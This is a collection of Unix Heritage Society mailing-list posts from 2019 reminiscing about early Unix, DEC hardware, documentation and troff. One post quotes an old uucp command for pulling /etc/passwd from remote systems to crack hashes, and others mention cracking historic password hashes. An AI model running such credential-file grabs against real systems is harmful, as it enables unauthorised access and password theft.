> From: Warren Toomey <wkt(a)tuhs.org>
> But wasn't "chdir" built into the PDP-7 Unix shell?
No. See "The Evolution of the Unix Time-sharing System", in section "Process
control".
Also, the old 'cd' had different syntax than today's (since there was no notion
of a pathname in the earliest Unix); it took instead a list of directories (e.g.
"cd dd ken").
Noel
On 10/21/19 9:05 AM, tuhs-request(a)minnie.tuhs.org wrote:
> Message: 17
> Date: Mon, 21 Oct 2019 08:10:00 -0400 (EDT)
> From:jnc@mercury.lcs.mit.edu (Noel Chiappa)
> To:tuhs@minnie.tuhs.org
> Cc:jnc@mercury.lcs.mit.edu
> Subject: Re: [TUHS] What was your "Aha, Unix!" moment?
> Message-ID:<20191021121000.34E3B18C09F(a)mercury.lcs.mit.edu>
>
> > From: Warren Toomey<wkt(a)tuhs.org>
>
> > But wasn't "chdir" built into the PDP-7 Unix shell?
>
> No. See "The Evolution of the Unix Time-sharing System", in section "Process
> control".
>
> Also, the old 'cd' had different syntax than today's (since there was no notion
> of a pathname in the earliest Unix); it took instead a list of directories (e.g.
> "cd dd ken").
>
> Noel
>
Wanna have some fun?
chdir system
then try to find your way back 'home'...
v0's subdirectories suck.
--
GPG Fingerprint: 68F4 B3BD 1730 555A 4462 7D45 3EAA 5B6D A982 BAAF
On the copy of this story that appears here:
http://crash.com/fun/texts/vaxen-dont.html
it is atrributed as such:
'The author of this piece is Jack Harvey, harvey(at)eisner.decus.org, and
it was originally published under the title "The Immortal Murderer" on
January 18th, 1989 on DECUServe, the DECUS member bulletin board.'
--Pat.
In `UNIX Assembler Reference Manual,' Dennis credits Knuth
for numeric temporary labels, with a reference to volume 1
of The Art of Computer Programming.
I'm several thousand kilometers from my copy of Knuth (though
rather nearer to Knuth himself, albeit not within asking
range), so I'll leave it to others to track down the exact
reference.
Norman Wilson
Toronto ON
(temporarily Sacramento CA)
{Been meaning to get to this one for a while...}
> From: Pat Barron <patbarron(a)acm.org>
> The idea of processes being able to talk to each other (without some
> kind of pre-arrangement, like setting up a pipe between them, or using
> temporary files) was just amazing ... On V7m, I stumbled across the
> mpx(5) man page.
It's probably worth pointing out that before V7, stock Unix _didn't_ have a
way for two un-related processes to communicate, hence the invention of port()
by Rand. See:
https://minnie.tuhs.org//cgi-bin/utree.pl?file=BBN-V6https://minnie.tuhs.org//cgi-bin/utree.pl?file=BBN-V6/doc/ipc
(Note: BBN did _not_ do the original port() stuff, they just used it.)
Noel
A little off-topic, but quite amusing...
-- Dave
---------- Forwarded message ----------
Time to post this classic; I don't recall who wrote it. Note that the
references are pretty obscure now...
-----
VAXen, my children, just don't belong some places. In my business, I am
frequently called by small sites and startups having VAX problems. So when a
friend of mine in an Extremely Large Financial Institution (ELFI) called me one
day to ask for help, I was intrigued because this outfit is a really major VAX
user - they have several large herds of VAXen - and plenty of sharp VAXherds to
take care of them.
So I went to see what sort of an ELFI mess they had gotten into. It seems they
had shoved a small 750 with two RA60s running a single application, PC style,
into a data center with two IBM 3090s and just about all the rest of the disk
drives in the world. The computer room was so big it had three street
addresses. The operators had only IBM experience and, to quote my friend, they
were having "a little trouble adjusting to the VAX", were a bit hostile towards
it and probably needed some help with system management. Hmmm, hostility...
Sigh.
Well, I thought it was pretty ridiculous for an outfit with all that VAX muscle
elsewhere to isolate a dinky old 750 in their Big Blue Country, and said so
bluntly. But my friend patiently explained that although small, it was an
"extremely sensitive and confidential application." It seems that the 750 had
originally been properly clustered with the rest of a herd and in the care of
one of their best VAXherds. But the trouble started when the Chief User went
to visit his computer and its VAXherd.
He came away visibly disturbed and immediately complained to the ELFI's
Director of Data Processing that, "There are some very strange people in there
with the computers." Now since this user person was the Comptroller of this
Extremely Large Financial Institution, the 750 had been promptly hustled over
to the IBM data center which the Comptroller said, "was a more suitable place."
The people there wore shirts and ties and didn't wear head bands or cowboy
hats.
So my friend introduced me to the Comptroller, who turned out to be five feet
tall, 85 and a former gnome of Zurich. He had a young apprentice gnome who was
about 65. The two gnomes interviewed me in whispers for about an hour before
they decided my modes of dress and speech were suitable for managing their
system and I got the assignment.
There was some confusion, understandably, when I explained that I would
immediately establish a procedure for nightly backups. The senior gnome seemed
to think I was going to put the computer in reverse, but the apprentice's son
had an IBM PC and he quickly whispered that "backup" meant making a copy of a
program borrowed from a friend and why was I doing that? Sigh.
I was shortly introduced to the manager of the IBM data center, who greeted me
with joy and anything but hostility. And the operators really weren't hostile
- it just seemed that way. It's like the driver of a Mack 18 wheeler, with a
condo behind the cab, who was doing 75 when he ran over a moped doing its best
to get away at 45. He explained sadly, "I really warn't mad at mopeds but to
keep from runnin' over that'n, I'da had to slow down or change lanes!"
Now the only operation they had figured out how to do on the 750 was reboot it.
This was their universal cure for any and all problems. After all it works on a
PC, why not a VAX? Was there a difference? Sigh.
But I smiled and said, "No sweat, I'll train you. The first command you learn
is HELP" and proceeded to type it in on the console terminal. So the data
center manager, the shift supervisor and the eight day-operators watched the
LA100 buzz out the usual introductory text. When it finished they turned to me
with expectant faces and I said in an avuncular manner, "This is your most
important command!"
The shift supervisor stepped forward and studied the text for about a minute.
He then turned with a very puzzled expression on his face and asked, "What do
you use it for?" Sigh.
Well, I tried everything. I trained and I put the doc set on shelves by the
750 and I wrote a special 40 page doc set and then a four page doc set. I
designed all kinds of command files to make complex operations into simple
foreign commands and I taped a list of these simplified commands to the top of
the VAX. The most successful move was adding my home phone number.
The cheat sheets taped on the top of the CPU cabinet needed continual
maintenance, however. It seems the VAX was in the quietest part of the data
center, over behind the scratch tape racks. The operators ate lunch on the CPU
cabinet and the sheets quickly became coated with pizza drippings, etc.
But still the most used solution to hangups was a reboot and I gradually got
things organized so that during the day when the gnomes were using the system,
the operators didn't have to touch it. This smoothed things out a lot.
Meanwhile, the data center was getting new TV security cameras, a halon gas
fire extinguisher system and an immortal power source. The data center manager
apologized because the VAX had not been foreseen in the plan and so could not
be connected to immortal power. The VAX and I felt a little rejected but I
made sure that booting on power recovery was working right. At least it would
get going again quickly when power came back.
Anyway, as a consolation prize, the data center manager said he would have one
of the security cameras adjusted to cover the VAX. I thought to myself,
"Great, now we can have 24 hour video tapes of the operators eating Chinese
takeout on the CPU." I resolved to get a piece of plastic to cover the cheat
sheets.
One day, the apprentice gnome called to whisper that the senior was going to
give an extremely important demonstration. Now I must explain that what the
750 was really doing was holding our National Debt. The Reagan administration
had decided to privatize it and had quietly put it out for bid. My Extreme
Large Financial Institution had won the bid for it and was, as ELFIs are wont
to do, making an absolute bundle on the float.
On Monday the Comptroller was going to demonstrate to the board of directors
how he could move a trillion dollars from Switzerland to the Bahamas. The
apprentice whispered, "Would you please look in on our computer? I'm sure
everything will be fine, sir, but we will feel better if you are present. I'm
sure you understand?" I did.
Monday morning, I got there about five hours before the scheduled demo to check
things over. Everything was cool. I was chatting with the shift supervisor
and about to go upstairs to the Comptroller's office. Suddenly there was a
power failure.
The emergency lighting came on and the immortal power system took over the load
of the IBM 3090s. They continued smoothly, but of course the VAX, still on
city power, died. Everyone smiled and the dead 750 was no big deal because it
was 7 AM and gnomes don't work before 10 AM. I began worrying about whether I
could beg some immortal power from the data center manager in case this was a
long outage.
Immortal power in this system comes from storage batteries for the first five
minutes of an outage. Promptly at one minute into the outage we hear the gas
turbine powered generator in the sub-basement under us automatically start up
getting ready to take the load on the fifth minute. We all beam at each other.
At two minutes into the outage we hear the whine of the backup gas turbine
generator starting. The 3090s and all those disk drives are doing just fine.
Business as usual. The VAX is dead as a door nail but what the hell.
At precisely five minutes into the outage, just as the gas turbine is taking
the load, city power comes back on and the immortal power source commits
suicide. Actually it was a double murder and suicide because it took both
3090s with it.
So now the whole data center was dead, sort of. The fire alarm system had its
own battery backup and was still alive. The lead acid storage batteries of the
immortal power system had been discharging at a furious rate keeping all those
big blue boxes running and there was a significant amount of sulfuric acid
vapor. Nothing actually caught fire but the smoke detectors were convinced it
had.
The fire alarm klaxon went off and the siren warning of imminent halon gas
release was screaming. We started to panic but the data center manager shouted
over the din, "Don't worry, the halon system failed its acceptance test last
week. It's disabled and nothing will happen."
He was half right, the primary halon system indeed failed to discharge. But the
secondary halon system observed that the primary had conked and instantly did
its duty, which was to deal with Dire Disasters. It had twice the capacity and
six times the discharge rate.
Now the ear splitting gas discharge under the raised floor was so massive and
fast, it blew about half of the floor tiles up out of their framework. It came
up through the floor into a communications rack and blew the cover panels off,
decking an operator. Looking out across that vast computer room, we could see
the air shimmering as the halon mixed with it.
We stampeded for exits to the dying whine of 175 IBM disks. As I was escaping
I glanced back at the VAX, on city power, and noticed the usual flickering of
the unit select light on its system disk indicating it was happily rebooting.
Twelve firemen with air tanks and axes invaded. There were frantic phone calls
to the local IBM Field Service office because both the live and backup 3090s
were down. About twenty minutes later, seventeen IBM CEs arrived with dozens
of boxes and, so help me, a barrel. It seems they knew what to expect when an
immortal power source commits murder.
In the midst of absolute pandemonium, I crept off to the gnome office and
logged on. After extensive checking it was clear that everything was just fine
with the VAX and I began to calm down. I called the data center manager's
office to tell him the good news. His secretary answered with, "He isn't
expected to be available for some time. May I take a message?" I left a
slightly smug note to the effect that, unlike some other computers, the VAX was
intact and functioning normally.
Several hours later, the gnome was whispering his way into a demonstration of
how to flick a trillion dollars from country 2 to country 5. He was just
coming to the tricky part, where the money had been withdrawn from Switzerland
but not yet deposited in the Bahamas. He was proceeding very slowly and the
directors were spellbound. I decided I had better check up on the data center.
Most of the floor tiles were back in place. IBM had resurrected one of the
3090s and was running tests. What looked like a bucket brigade was working on
the other one. The communication rack was still naked and a fireman was
standing guard over the immortal power corpse. Life was returning to normal,
but the Big Blue Country crew was still pretty shaky.
Smiling proudly, I headed back toward the triumphant VAX behind the tape racks
where one of the operators was eating a plump jelly bun on the 750 CPU. He saw
me coming, turned pale and screamed to the shift supervisor, "Oh my God, we
forgot about the VAX!" Then, before I could open my mouth, he rebooted it. It
was Monday, 19-Oct-1987. VAXen, my children, just don't belong some places.
-- Dave
where did the relative labels come from? I still show them to people
when we're doing assembly and still use them all the time. Most people
have not seen them and find them wonderfully convenient. I know they
were in as by the time I came along in 1976; when did they first show
up?
I'm amused (in a good way) that this thread persists, and
without becoming boring.
Speaking as someone who was Ken's sysadmin for six years,
I find it hard to get upset over someone cracking a password
hash that has been out in the open for decades, using an
algorithm that became pragmatically unsafe slightly fewer
decades ago. It really shouldn't be in use anywhere any
more anyway. Were I still Ken's sysadmin I'd have leaned
on him to change it long ago.
So far as I know, my password from that era didn't escape
the Labs, but nevertheless I abandoned it long ago--when
I left the Labs myself, in fact.
I do have one password that has been unchanged since the
mid-1990s and is stored in heritage hash on a few computers
that don't even have /etc/shadow, but those are not public
systems. And it's probably time I changed it anyway.
None of this is to excuse the creeps who steal passwords
these days, nor to promote complacency. At the place I now
work we had a possible /etc/shadow exposure some years back,
and we reacted by pushing everyone to change their passwords
and also by taking various measures to keep even the hashes
better-hidden. But there is, or should be, a difference
between a password that is still in use and one that was exposed
so long ago, and in what is now so trivial an algorithm, that
it is no more than a puzzle for fans of the old-fart days.
Norman Wilson
Toronto ON
Apropos of OCR on shabby typewriting, I've had good luck with doing
the OCR twice with the paper differently positioned, then using diff
to spot discrepancies. For a final proofreading, a team of two--one
reading the original aloud, the other checking the copy, works much
faster and more accurately than a single person checking side-by-side
texts.
Doug
Back in the heyday of uucp, some sites were lazy and allowed
uucico access to any file in the file system (that was accessible
to the uucp user). A common ploy for white hats and black hats
was to try
uucp remotesys!/etc/passwd ~/remotesys
or the like, and see what came in and whether it had any easy
hashes (shadow password files didn't quite exist yet).
The system known to the uucp world as research! was more
careful: / was mapped to /usr/spool/uucp. We left a phony
etc/passwd file there, containing plausible-looking entries
with hashes that, if cracked, spelled out
why
are
you
wasting
your
time
I don't remember whether anyone ever stole it by uucp, though
I think Bill Cheswick used it to set up the phony system
environment for Berferd to play in (Google for `cheswick berferd'
if you don't know the story).
Norman Wilson
Toronto ON
THE EARLIEST UNIX CODE: AN ANNIVERSARY SOURCE CODE RELEASE
http://bit.ly/31pWcvM
Cheers,
Lyle
--
73 NM6Y
Bickley Consulting West Inc.
https://bickleywest.com
"Black holes are where God is dividing by zero"
THE EARLIEST UNIX CODE: AN ANNIVERSARY SOURCE CODE RELEASE
http://bit.ly/31pWcvM
Cheers,
Lyle
--
73 NM6Y
Bickley Consulting West Inc.
https://bickleywest.com
"Black holes are where God is dividing by zero"
> From: jnc(a)mercury.lcs.mit.edu (Noel Chiappa)
>
> > From: Doug McIlroy
>
> > doing legwork for Multics I ran the following experiment on a lot of
> > then-current time-sharing systems.
>
> Fascinating; you don't happen to remember the ones you tried, do you?
>
> Also, when you say "legwork for Multics", was this something done during
> the planning stages (so, say '64-'65), or later on?
It was probably 1965. The places we visited
included at least Rand, NBS, Michigan, and Dartmouth.
I specifically remember trying the experiment
at Michigan and Dartmouth. There were other places,
too, but they've dropped from memory.
Doug
I don't know that I had a single "Aha!" moment, but there were a few
things that just got hold of me and led me down the Unix path...
The first Unix I used was V7m on a PDP-11/40, in college. By this point,
I was "aware" of Unix, in theory I even knew C - but never had an actual
system to try it out on until this point. I'd used other operating
systems (or things that called themselves operating systems...), primarily
TRSDOS, CP/M, OS1100, TOPS-10, TOPS-20, and VMS. Unix was certainly the
first multiuser operating system that I ever had administrator access on.
1) The idea of taking the output of one program, and using it directly as
input to another program - and the simplicity by which it was done -
was revolutionary to me. It was not unusual for me at that time to do
things like this by having the first program create a temporary file,
and then having another program open this temporary file and use it as
input, but the whole paradigm of stdin/stdout/pipes made it so you
didn't even have to "know" in your program that you might need to use
the output of some other program (via a temporary file) as input.
That was amazing to me.
2) Unix was really the first operating system that I had full, buildable
sources for. (I theoretically had access to VMS source code, but it
was on microfiche and not in machine-readable form, so it was just a
read-only reference.) If I wanted to see how the OS was doing
something, I could look. If I wanted to change something the OS did,
or add something to the OS (either in the kernel, or as a user space
utility), I could do that (and I did on a couple of occasions). If
something was broken, I could try to figure it out and fix it. There
was this bug in V7m, where if you were on a non-separate I&D system
that didn't have the floating point option (and our 11/40 did not), and
you tried to run an "a.out" file that was zero length, you'd get a
kernel panic. We were using the system for a computer architecture
course, students were programming in assembly language, and if there
was a problem with the source file the assembler would leave a zero
length executable behind. Of course, students would try to run it
anyway, even though "as" produced errors. We'd sometimes get 3 or 4
system crashes in the course of an evening. The students and the
instructors were all up in arms because any time this would happen,
everyone would lose whatever they were working on (and maybe more, if
the filesystem got messed up during the panic), and if there was no one
around who had a key to the computer room when it happened, it would
stay down until they could find someone who had physical access and the
knowledge to know how to deal with "fsck"... (The construction in the
lab was pretty minimal, and the walls to most of the rooms didn't go
all the way to the ceiling - sometimes when it crashed and no one was
around, they'd take to climbing over the wall to reboot the system
themselves - which could produce disasterous results of there were
filesystem issues...) I found the problem, and I fixed it. That was
my first adventure in kernel debugging... (Later, we migrated to a
PDP-11/24 and we ordered the KEF11-A floating point option for it, so
that problem became moot.)
3) The idea of processes being able to talk to each other (without some
kind of pre-arrangement, like setting up a pipe between them, or
using temporary files) was just amazing, and this was the first time
I'd really seen it. I knew VMS had this thing called a "mailbox",
but I never used it for anything and didn't even know what it was
for. On V7m, I stumbled across the mpx(5) man page. I think the
first time I came across it, I stared at it for hours, looking at
the description and trying to figure out what you'd even use that
functionality for. At some point it was like a lightning bolt hit
me - "Oh, wait! You can use this to send messages between unrelated
processes!" Except V7m came with one little proviso - the mpx code
was there, but it didn't work... So I dug into it, and made it work -
at least, well enough for what I wanted to use it for. I wrote a
multiuser chat program with it (isn't that the first thing any
undergrad does when they discover interprocess communications? :-) ).
I had a similar epiphany with sockets on 4.2BSD a year or two later,
under similar circumstances. The one thing I found in command with
both mpx and sockets was that the documentation described the
low-level functionality - but there was nothing that clearly stated,
"This functionaliy is used to allow processes to talk to each other"...
I'm sure there are plenty more experiences with early Unix that ensured
that I'd continue down this path, but I think these are my favorites.
--Pat.
Possibly the most time consuming install I did was installing Xenix on a
bunch of Intel i310 systems. Xenix was a "secondary" OS for these
systems, the main OS being iRMX. Xenix for these systems was distributed
on 5.25" floppies. Lots and lots of floppies... They came in a 3-ring
binder, many pages of floppies... We also had a couple of i380 systems,
Xenix for those came on 8" floppies... That was time consuming, but it
was just manual labor.
The most unpleasasnt install I can recall was AIX 2.2.1 on the IBM-PC/RT.
Which also was really (under the covers) Interactive UNIX, with some other
stuff mixed in. Not only was this also time-consuming with a binder full
of 5.25" floppies, but my recollection is that there were too many
opportunities to make a tiny little mistake during the install and have to
start all over again.
--Pat.
Apropos of Steve Johnson's evocative description of JCL and other
pre-Unix OS interfaces, doing legwork for Multics I ran the following
experiment on a lot of then-current time-sharing systems.
As a model of creating and installing a new compiler, I used a very
short Fortran program that simply copied its input to its output,
stopping after finding END in column 7 of the input. The drill was
compile the program
run it, using its own source as input
compile the freshly made output file
This failed on every system I tried it on, though local
experts could intervene with magic to overcome the
gratuitous file-type distinctions that typically
got in the way. Dartmouth's DTSS came closest, but
inexplicably, even to the gurus, it had a special
prohibition against a program reading the source
from which it was compiled.
Incidentally, my favorite manifestation of JCL-like mumbo jumbo
was the ironically named FUTIL control card in GECOS.
Doug
> From: Doug McIlroy
> doing legwork for Multics I ran the following experiment on a lot of
> then-current time-sharing systems.
Fascinating; you don't happen to remember the ones you tried, do you?
Also, when you say "legwork for Multics", was this something done during
the planning stages (so, say '64-'65), or later on?
Noel
I wrote a UNIX shell based on Python the other night in case anyone's
interested: https://github.com/terrycojones/daudin Apologies for a modern
instead of an historic subject...
Terry
FYI. I sent this to one of the lead DOC people from the old days to see if she knew. Here is her answer.
Begin forwarded message:
> From: "Janet Egan"
> Date: October 11, 2019 at 7:53:16 PM EDT
> To: "'Clem Cole'"
> Subject: RE: Curious Question from the Ether about use of Upper and Lower case at DEC
>
> Hi Clem,
>
> Hmm, I don’t remember whether the style guide addressed that. In the docs for RSX-11M and such I always wrote it “PDP-11”, that is upper case with the dash. I do remember the logo on the machine as always lower case with no dash. The PDP-8 had the same style logo. And you’re right about seeing the lower case on the cover of the handbooks. I have never seen the lower case with the dash or the upper case without it. I don’t think I still have my copy of the style guide. Maybe I’ll take a look around my archives for it.
>
> What a fun question to be thinking about .
> Janet
>
>
> From: Clem Cole
> Sent: Friday, October 11, 2019 9:47 AM
> To: Janet Egan
> Subject: Curious Question from the Ether about use of Upper and Lower case at DEC
>
> Janet,
> I'm part of The Unix Historical Society (TUHS) mailing list and a topic came up that I thought you might be able to shed some light on. The observation was that 'DEC seemed to have a schizophrenic attitude to wrt to use of upper and lower case WRT to the PDP-11 brand,' i.e. sometimes using "PDP-11" and sometimes "pdp11" (but I note rarely if ever PDP11 or pdp-11) . For instance, the logo on the system itself was all lower: PDP-11/40 but DEC documentation mostly used uppercase in the text; but when used on the places like the cover could be either e.g. the "pdp11 peripherals handbook" to transcribe the cover exactly but it uses upper case "PDP-11" several times on pg 1-1 and the same on the binding. But I could not find examples of pdp-11 or PDP11, i.e. if all lower it was with the dash or all upper without.
>
> Do you remember if there were rules or guidelines and if so what they might have been?
>
> Thanks,
> Clem
I was reminded of this by Larry's comment:
> I miss Brian on this list. I've interacted with him over the years, the
> one I remember the most was I was trying to do an awk like interface to a
> key/value "database".
Recently I've had to deal with a lot of data in CSV
(comma-separated-value) format. Awk is *almost* prefect for this, but
of course doesn't handle the quoting of fields that contain commas.
One can usually work around it by finding a character that doesn't
occur in the data and converting the CSV file to use that as the
separator, but it's not ideal.
Awk's input could easily be modified to handle CSV files, but output
would be a bit more difficult, because you don't specify field
boundaries explicitly on output. One possibility would be a printf()
format specifier that takes a field and quotes it appropriately.
-- Richard
--
The University of Edinburgh is a charitable body, registered in
Scotland, with registration number SC005336.
> From: Arnold Skeeve
> K&R was so dense that my head was swimming after the first read.
I learned C from "Programming in C - A Tutorial", by Brian Kernighan, which
for some reason seemed to have fallen into desuetude from V7 on (at least,
that was the impression I got). Which was a pity, it was one of the best
documents I ever read - a breeze to read through, and clear as crystal.
Noel
Not sure I had an "aha erlebnis" with UNIX. I'd done some testing on a
Philips PTS6000 with T.O.S. All assembler code with debugging syslod
the most fun (breakpointing code which moves itself in memory). Then I
was a user on VAX 11/730, 11/750 with Ultrix which was a bit of a step
down. The VAXes run VMS during the week and only in weekends we could
place our disk pack and boot Ultrix. Funny feeling to go home when
colleagues arrive in the morning.
Later "Propriety UNIX" versions based on System III, 7, V. No source.
Still had shells, command line, scripts, a bit of programming in C if
all else fails (or is too slow). Never liked Windows. In that sense
maybe more an 'aha windows' moment to quickly forget :-)
Cheers,
uncle rubl
Well, I guess mine is kinda weird. I had messed with a number of
computer systems a litle bit and then became proficient with 516-TSS
as a result of being part of the explorer scout post at BTL Murray
Hill in high school. Interesting note is that one of my advisors
who wrote a lot of 516-TSS interviewed Ken for his job at BTL.
Ended up with a paid job at BTL starting near the end of my senior
year of high school. Needed to document my work. Don't remember
why, but my group acquired a PDP-11/40 that was across the hall
from the 516 lab in building 2 that was running UNIX version 3.
I started using roff on it to do my documentation which meant
learning ed and a bunch of other tools. Of course, I took the
manual home and read it cover to cover and started messing around
with the various cool tools that it had and was hooked.
Jon
> From: Tony Travis
> It's always puzzled me when everyone talks about [the] PDP11 when, in
> fact, is says "pdp11" on the system itself:
DEC documentation mostly used uppercase in the text; e.g. the "pdp11
peripherals handbook" (to transcribe the cover exactly) uses "PDP-11"
several times on pg 1-1.
Noel
> From: Warren Toomey
> What was your "ahah" moment when you first saw that Unix was special,
> especially compared to the systems you'd previously used?
Sometime in my undergrad sophmore year, IIRC. A friend had a undergrad
research thing with DSSR, who I think at that point had the first UNIX at
MIT. He showed me the system, and wrote a tiny command in C, compiled it, and
executed the binary from the shell.
No big deal, right? Well, at that point ('75 or so), the only OS's I had used
were RSTS-11, a batch system running on an Interdata (programs were submitted
on card decks), the DELPHI system (done by the people in DSSR), and a few
similar things. I had never used a system where an ordinary user could 'add' a
command to the command interpreter, and was blown away. (At that point in
time, not many OS's could do that.)
Unix was in a whole different world compared to contemporaneous PDP-11
OS's. It felt like a 'mainframe' OS (background jobs, etc), but on a mini.
Noel
For a contrast in aha moments, consider this introduction to
an early Apple (Apple II, I think).
When my wife got one, my natural curiosity led me to try to
make "Hello world".
I asked her what to use as an editor and learned it all depends
on what you're editing.
So I looked in the manual. First thing you do to make a C program
is to set up a "project", as if it was a corporate undertaking.
I found it easier to write a program in some other editor than
the one for C. Bad idea. Every file had a type and that editor
produced files of some type other than C program.
After succumbing to the Apple straitjacket, I succeeded.
Then I found "Hello world" given as an example in the manual.
The code took up almost a page; real men make programs that
set up their own windows.
Aha, Apple! Not intended for programmers.
And that didn't change until OS X.
Doug
I miss Brian on this list. I've interacted with him over the years, the
one I remember the most was I was trying to do an awk like interface to a
key/value "database". I talked to him about it and he sent me ~bwk/awk
which had all the original awk source and the troff source to the awk
book in english and french.
Ken, Doug, Rob, Steve, anyone, could you coax him onto this list?
If you want me to try first I will, I don't know if he remembers me
or not. But I can try and then maybe one of you follow up?
All, we just had about a dozen new subscribers to the TUHS list. Rather than
e-mail you all individually, I thought I'd use the list itself to say
"Welcome!".
The TUHS list generally has a high signal/noise ratio on the history of
Unix, the systems and software, and anecdotes from those who used the
various flavours. Occasionally, we drift a bit off-topic and I'll gently
nudge the conversation back to Unix history.
The list archives are at: https://minnie.tuhs.org/pipermail/tuhs/
and you should browse the last couple of months to get a feel for
what we talk about.
Cheers, Warren
https://bsdimp.blogspot.com/2019/10/video-footage-of-first-pdp-7-to-run-uni…
is a blog entry where I step through the evidence that the PDP-7 in The
Incredible Machine video that was posted here a while ago is quite likely
the PDP-7 Ken used to create Unix after its days of starting in Bell Labs
films were over...
Warner
I've lugged these around for 35-ish years. I'd like to seem them
scanned and stored someplace as permanent as can be found, so if
someone/anyone could tell me how to facilitate that, I'll package
them for shipping.
My apologies if this has already been done and I'm simply not aware of it.
I have other stuff that probably needs the same treatment, but
excavating the alluvial layers that have accumulated will take time.
Single small-format red binder:
Unix System User Reference Manual - AT&T Bell Labs
Unix System Release 2.0
including Division 452 standard and local commands
October 1985
Set of four small format gray binders:
Documenter's Workbench 1.0, April 1984
1. Introduction and Reference Manual, 307-150, issue 2
2. Text Formatter Reference, 307-151, issue 2
3. Macro Package Reference, 307-152 issue 2
4. Preprocessor Reference, 307-153, issue 2
Set of two slip-cased small format maroon/gray binders:
Unix System V Documenters Workbench Release 2.0
1. Technical Discusion and Reference 310-005, issue 1
2. Product Overview 999-805-007IS, User Guide 999-805-006IS,
Reference Card 999-805-008IS, issue 1
---rsk
I’ve got a few books I’ve just pulled off the shelf and no longer want/need.
I’m hoping someone will give them a good home.
UNIX System Labs Inc UNIX(r) System V Release 4
Programmers Guide: System Services and Application Packaging Tools
Device Driver Interface/Driver-Kernel Interface (DDI/DKI) Reference Manual (2 copies)
AT&T 3B2/3B5/3B15 Computers Assembly Programming Manual
Sun Microsystems Inc (Sun Technical Reports)
The UNIX System - 1985
Sun 3 Architecture - 1986
I’m willing to split postage on mailing them wherever. If you are local (San Diego)
I’m willing to meet you wherever for an exchange and a coffee.
David
(Also posted on the cctalk mailing list)
I am surprised to not find any scans of early (pre-1980) Seventh Edition
Unix Programmer's Manual. Does anyone have any? (We do have the source
files and I see volume 2 manual scanned from later years.)
Also where is a copy the new license introduced with v7? I have copy of
1973 and 1974. Anyone have a scanned later version?
from etc/rc:
echo "Restricted rights: Use, duplication, or disclosure
is subject to restrictions stated in your contract with
Western Electric Company, Inc." >/dev/console
Thanks,
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
> From: Lars Brinkhoff
> There was no 635 at Project MAC, was there?
I seem to recall reading about one. And in:
https://multicians.org/chrono.html
there's this entry: "08/65 GE 635 delivered to Project MAC". Clicking on the
'GE 635' link leads to "MIT's GE-635 system was installed on the ninth floor
of 545 Tech Square in 1965, and used to support a simulated 645 until the real
hardware was delivered."
Noel
The Dallas Ft. Worth UNIX Users Group
will be highlighting the 50th anniversary on October 10,
November 14, and maybe in December.
http://www.dfwuug.org/wiki/Main/Welcome
I will be presenting about the early history next week
and then about BSD-specific history in November.
Any of you in the DFW area? Any suggestions on anyone local to invite? I
am also looking for anyone local who can display old hardware or
materials at the event. I only have some old books and training
materials from 1980's.
Does anyone have scanned copies of early Lions commentary? (Not the 2000
printing, unless it looks identical, please let me know.)
I will try to share my slides to this list by end of this week. (I did
look at an early draft of Warner's slides, but didn't look at his final
slides nor watch his presentation yet. My presentation is from scratch
for now.)
Jeremy C. Reed
echo Ohl zl obbx uggc://errqzrqvn.arg/obbxf/csfrafr/ | \
tr "Onoqrsuvxzabcefghl" "Babdefhikmnoprstuy"
> Was patent department that first used Unix on PDP-11 and roff (~1971)
> same department that would later handle Unix licensing two years later?
> (~1973)
No. The former was the BTL legal and patent department. The latter was
at AT&T (or perhaps Western Electric).
Doug
> From: Lars Brinkhoff
> Unfortunately it's very small.
There's a larger version hiding 'behind' it.
There are very few 645 images. There's the large painting of a 645, which
for many years hung in the hallway on the 5th floor of Tech Sq:
https://multicians.org/645artist.html
Noel
Hi, I remember that someone had recovered some ancient /etc/passwd files
and had decrypted(?) them, and I remember reading that either ken or
dmr's
password was something interesting like './,..,/' (it was entirely
punctuation characters, was around three different characters in total,
and
was pretty damn short). I've tried to find this since, as a friend was
interested in it, and I cannot for the life of me find it!
Do any of you remember or have a link? :)
Thanks!
--
"Too enough is always not much!"
OK. I've shared my slides for the talk.
Some of the family trees are simplified (V7 doesn't have room for all its
ports, for example)
Some of it is a little cheeseball since I'm also trying to be witty and
entertaining (we'll see how that goes).
Please don't share them around until after my talk on the September 20th
I'd like feedback on the bits I got wrong. Or left out. Or if you're in
this and don't want to be, etc.
All the slides after the Questions slide won't be presented and will likely
be deleted.
https://docs.google.com/presentation/d/177KxOif5oHARyIdZHDq-OO67_GVtMkzIAlD…
Please be kind (but if it sucks, please do tell). I've turned on commenting
on the slides. Probably best if you comment there.
I have a video of me giving this talk, but it's too rough to share...
Thanks for any help you can give me.
Warner
So my kid is using LaTex and I'd like to show him what troff can do.
For the record, back when he was born, 20 years ago, I was program
chair for Linux Expo (which sounds like a big deal but all it meant
was I had the job of formatting the proceedings). LaTex was a big
deal but I pushed people towards troff and the few people that took
the push came back and said "holy crap is this easy".
My kid is a math guy, does anyone have some eqn input and output
that they can share?
Thanks,
--lm
"why is the formatting so weird" someone asked me.
I am guessing, looking at RFC 1, that it was formatted with an
ancestor of runoff but ... anyone?
ron
> From: Warren Toomey
> All, I'm just musing where is the best place to store Unix
> documentation. My Unix Archive is really just a filesystem, so it's not
> so good to capture and search metadata.
> Is anybody using archive.org, gunkies or something else
BitSavers seems to be the canonical location for old computer documentation.
The CHWiki (gunkies.org) isn't really the best place to put original documentation,
but that's where I'd recommend putting meta-data. As for searching meta-data, are
you speaking of something more powerful than Google?
Noel
PS: Speaking of old Unix documentation, I recently acquired a paper copy of the
PDP-11 V6 Unix manual. Is that something I should scan? I don't know if you
already have it (I know where to find sources in the archives, but I don't
know where documentation scans live.)
> The scans for v0 code are in lowercase. I assume printed on TTY 37.
> But why is the early PDP-7 code in lowercase?
Once you've used a device with lower case, upper case looks as
offensive as a ransom note. I went through this in moving "up"
from Whirlwind to IBM's 704. By 1969, we'd all had lower-case
terminals in our homes for several years.
So Unix was ASCII from the start. Upper-case from a TTY 33 was converted
to lower. On the PDP-11, at least, there was an escape convention for
upper case. I believe the lower-case convention was explained in the
introduction. In particular if you logged in with an upper-case user
name, the terminal driver was set to convert everything to lower.
Remember, too, that 33's used yellow paper. For printing on white
we had use other machines that had full ASCII support.
Doug
> does anyone have some eqn input and output that they can share?
I have a quite elaborate document that uses eqn, pic, and tbl. In
fact one table contains both pic and eqn entries (but not subtables;
Latex beats roff in being recursive). Take a look at
